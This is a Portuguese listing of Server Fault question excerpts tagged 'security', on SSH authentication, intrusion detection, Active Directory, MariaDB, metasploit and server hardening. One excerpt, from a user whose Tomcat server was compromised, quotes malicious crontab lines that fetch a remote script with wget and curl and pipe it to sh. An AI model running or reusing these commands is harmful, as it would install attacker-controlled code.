Perguntas com a marcação «security»

Eu gostaria de poder autenticar um conjunto de usuários usando autenticação de chave pública e outros usuários para usar a autenticação por senha. Isso é possível no OpenSSH no Linux? Se sim, como faço para fazer isso? Depois de analisar /etc/ssh/sshd_config, parece que estou limitado a ativar a autenticação de …

9 linux  security  ssh 

Eu gostaria que o Samhain monitore um arquivo, por exemplo /root/somefile,. Este arquivo não existe atualmente, mas eu gostaria de ser notificado se ele for criado a qualquer momento. Eu adiciono isso a samhainrc: [ReadOnly] file = /root/somefile Isso faz com que o Samhain emita estas entradas de log: Oct …

8 linux  security  intrusion-detection 

Eu tenho cerca de 200 usuários. 50 estão na Ásia, 50 na Europa Meridional e Oriental e cerca de 100 na Europa Ocidental. Gostaria de apontar os 50 usuários que estão na Ásia para nosso DC na Ásia e, atualmente, parece que eles estão se autenticando em nossos servidores europeus, …

8 windows  windows-server-2008  active-directory  security 

Ao executar uma guerra de projeto no servidor Apache tomcat, descobri que o servidor foi comprometido. Enquanto estiver executando a guerra em um desconhecido, cronestá executando assim [root@App2 tmp]# crontab -l -u tomcat */11 * * * * wget -O - -q http://91.230.47.40/pics/logo.jpg|sh */12 * * * * curl http://91.230.47.40/pics/logo.jpg|sh …

8 linux  shell  security  tomcat 

Fechadas. Esta questão está fora de tópico . No momento, não está aceitando respostas. Deseja melhorar esta pergunta? Atualize a pergunta para que ela esteja no tópico sobre Falha no servidor. Fechado há 3 anos . Qual é a maneira mais simples de obter uma notificação quando eventos específicos aparecem …

8 security  windows-event-log 

Acabei de instalar MariaDbum novo Ubuntu Gnome e executei o mysql_secure_installation posteriormente, onde defini uma senha de administrador decente, removi o usuário anônimo etc. Depois, percebi um comportamento estranho em relação à senha do administrador: Se eu tentar fazer login na minha conta de usuário normal usando o comando mysql …

8 security  mariadb  authorization 

Um novo metasploit no kalilinux 2016 (mais recente estável) systemctl start postgresql OK No msfconsole msf > db_status [*] postgresql connected to msf Quando inicio a pesquisa msf > search samba [!] Module database cache not built yet, using slow search Então, eu reconstruo o cache ... msf > db_rebuild_cache …

8 linux  security 

Esta pergunta está relacionada ao tópico do Twitter do @ SwiftOnSecurity: https://twitter.com/SwiftOnSecurity/status/655208224572882944 Depois de ler o tópico, ainda não entendi por que você deseja desativar o logon de rede para contas locais. Então, aqui está o que estou pensando, corrija-me onde estou errado: Digamos que eu tenha um AD configurado …

8 windows  active-directory  security  group-policy  windows-server-2012-r2 

Antecedentes : a agregação remota de logs é considerada uma maneira de melhorar a segurança. Geralmente, isso lida com o risco de que um invasor que comprometa um sistema possa editar ou excluir logs para frustrar a análise forense. Pesquisei opções de segurança em ferramentas de log comuns. Mas algo …

8 security  logging  rsyslog  logstash  syslog-ng 

Eu tenho um servidor dedicado debian. Estou tentando protegê-lo e uma maneira que pensei que seria bom é desligar os serviços de que não preciso, como o FTP, por exemplo. Estou sugerindo executar algo parecido com isto na implantação: service ntp stop update-rc.d -f ntp remove service vsftpd stop update-rc.d …

8 linux  security  debian 

Minha conta gratuita da AWS expirou. Excluí todos os recursos S3 e EC2, mas estou vagando se posso deixar o Key Pairse Security Groupssem ter que pagar por eles. (Os recursos da minha conta ficam assim agora: Recursos ) A documentação da Amazon parece não mencionar esse problema. Esses recursos …

8 security  amazon-ec2  amazon-web-services  amazon-s3  resources 

Já temos um certificado curinga para *.mycompany.com. Nossa rede possui hosts que são acessíveis apenas internamente. Todos eles pertencem ao internal.mycompany.comsubdomínio. Há um servidor privado com o nome do host server.internal.mycompany.comno qual implantei nosso certificado curinga. Quando visito o servidor da Web, recebo um erro de incompatibilidade de nome de …

8 security  ssl-certificate  subdomain  domain 

Pense em uma empresa de hospedagem na web que deseja permitir que os usuários gerenciem arquivos e repositórios git via ssh. Isso inclui: cópia segura (scp) criando, copiando, movendo / renomeando e excluindo arquivos executando um subconjunto restrito de comandos para controle de origem e edição de texto (git, vim, …

8 linux  security 

Eu já vi menção de proteger / dev / shm e / proc e fiquei imaginando como você faz isso e o que consiste em fazer? Suponho que isso envolva algum tipo de edição /etc/sysctl.conf. Como estes? kernel.exec-shield = 1 kernel.randomize_va_space = 1

8 linux  security  kernel 

Um de nossos servidores de correio semi-ocupado (sendmail) teve várias conexões de entrada nos últimos dias de hosts que emitem comandos de lixo. Nos últimos dois dias: conexões SMTP recebidas com comandos inválidos de 39.000 IPs exclusivos os IPs vêm de várias faixas em todo o mundo, não apenas de …

8 linux  security  smtp  sendmail